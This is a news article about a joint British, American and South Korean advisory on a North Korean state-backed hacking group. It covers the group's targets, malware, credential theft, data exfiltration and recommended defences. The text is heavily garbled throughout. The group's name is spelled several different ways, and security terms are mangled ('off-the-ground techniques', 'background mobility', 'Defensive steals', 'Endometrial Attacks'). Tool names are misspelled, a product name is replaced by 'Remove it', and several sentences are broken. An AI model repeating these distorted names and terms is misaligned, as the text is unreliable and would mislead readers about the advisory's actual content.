Britain, the US and South Korea have warned of a global espionage campaign by a North Korean-sponsored cyber threat actor, designed to advance the regime’s military and nuclear ambitions.

The joint government advisory explained how the group, Known as Andrell.has compromised critical national infrastructure (CNI) organizations to access sensitive and classified technical information and intellectual property data.

The threat actor primarily targets organizations in the defense, aerospace, energy, nuclear and engineering industries to exfiltrate information such as contract details, design drawings and project specifications.

The group works on behalf of the Pyongyang government, using the intelligence gathered to expand its military and nuclear programs.

Andrel has also been seen pursuing attacks against ransomware. American health care organizations as a means of raising funds to finance further espionage activities.

Authorizing agencies estimate that Andriel is part of the Third Bureau of the Democratic People’s Republic of Korea (DPRK) Reconnaissance General Bureau (RGB).

Now read: Cybercrime a key revenue stream for North Korea’s weapons program

The group and its cyber techniques are a constant threat to various industry sectors worldwide.

Paul Chichester, director of operations at the UK’s National Cyber ​​Security Center (NCSC), commented: “The global cyber espionage operation we uncovered today shows that state-sponsored actors in the DPRK are using their military and nuclear Ready to move forward with the programs.”

He added: “This should remind critical infrastructure operators of the importance of protecting the sensitive information and intellectual property they hold on their systems to prevent theft and misuse.”

How Andriel Targets CNI Organizations

The advisory highlighted that Endrail primarily exploits known software vulnerabilities, e.g Log4jTo gain initial access to target networks.

The group identifies potentially vulnerable systems using publicly available Internet scanning tools that reveal information such as vulnerabilities in publicly exposed web servers.

Read Now: Vulnerabilities Now Top Initial Access Path for Ransomware

Andrell has researched several major vulnerabilities as part of his reconnaissance process. These include Apache ActiveMQ, Remove it, Barracuda Email Security Gateway, GoAnywhere MFT And Log4j.

After initial access, the group leverages custom tools and malware for discovery and execution. This includes the development of a wide range of RATs to enable remote access, system manipulation and background mobility.

These tools include functionality designed for data discovery and extraction, including execution of arbitrary commands, key logging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing files. , capturing network connections, and uploading content to command and control (C2).

Andrel also leverages open source malware tools, such as 3Proxy, AysncRAT and WinRAR.

Using such publicly available malware helps attackers hide and obfuscate their identities, making attribution difficult.

Techniques for staying off the ground

Threat actors are well-versed in off-the-ground techniques – using local tools and processes within compromised networks. These tools are used to support tasks such as Defensive stealsaccess to credentials, discovery and background mobility.

These include legitimate tools such as Windows Command Line, PowerShell, Windows Management Instrumentation Command Line (WMIC).

The agencies observed that Andrel has a preference for using netstat commands. Often, typos and other mistakes are made, indicating that the commands are not copied directly from a playbook and the actors have a flexible and impromptu style, as well as the English language of the attackers. Poor grip.

Actors routinely pack late-stage tooling. VM Protect and Themeda, which has advanced anti-debugging and detection capabilities.

They change settings on compromised systems to force the system to store credentials and then use the aforementioned tools to steal credentials.

Infrastructure around the world is used to send commands to compromised systems, with malware disguised as network traffic inside HTTP packets.

Data extraction

To collect data, threat actors use malware to search through files previously placed on the network that may be of interest, including keywords related to defense and military fields in English and Korean. Scanning computer files for words.

They then identify stolen data by enumerating files and folders in many directories and servers using a command-line activity or functionality built into custom tools. The corresponding files are collected in RAR archives.

Finally, logging data directly from victims’ networks to web services such as cloud storage or servers not connected to their primary C2, including actor-controlled cloud-based service accounts.

Actors have also been seen using PuTTY and WinSCP to extract data via File Transfer Protocol (FTP) and other protocols to North Korean-controlled servers.

How to Reduce Endometrial Attacks

The advisory identifies several areas in which CNI defenders should focus on mitigating the tactics used by Andriel. These include:

  • Identify assets affected by the Log4j vulnerability, and upgrade them to the latest version
  • By maintaining an inventory of systems and applications, quickly applying patches as they are released, placing vulnerable or potentially dangerous systems behind reverse proxies that require authentication, and web application firewalls. Prevent exploits by deploying and configuring WAFs.
  • Deploy endpoint agencies or other monitoring mechanisms to prevent and detect further adversarial activities.
  • Monitor for suspicious command-line activity, implement multi-factor authentication for remote access services, and properly distribute and use authorization tools for critical assets.
  • Encrypt all sensitive data, including personal information.
  • Block access to unused ports.
  • Change passwords when they are suspected of being compromised.



Source link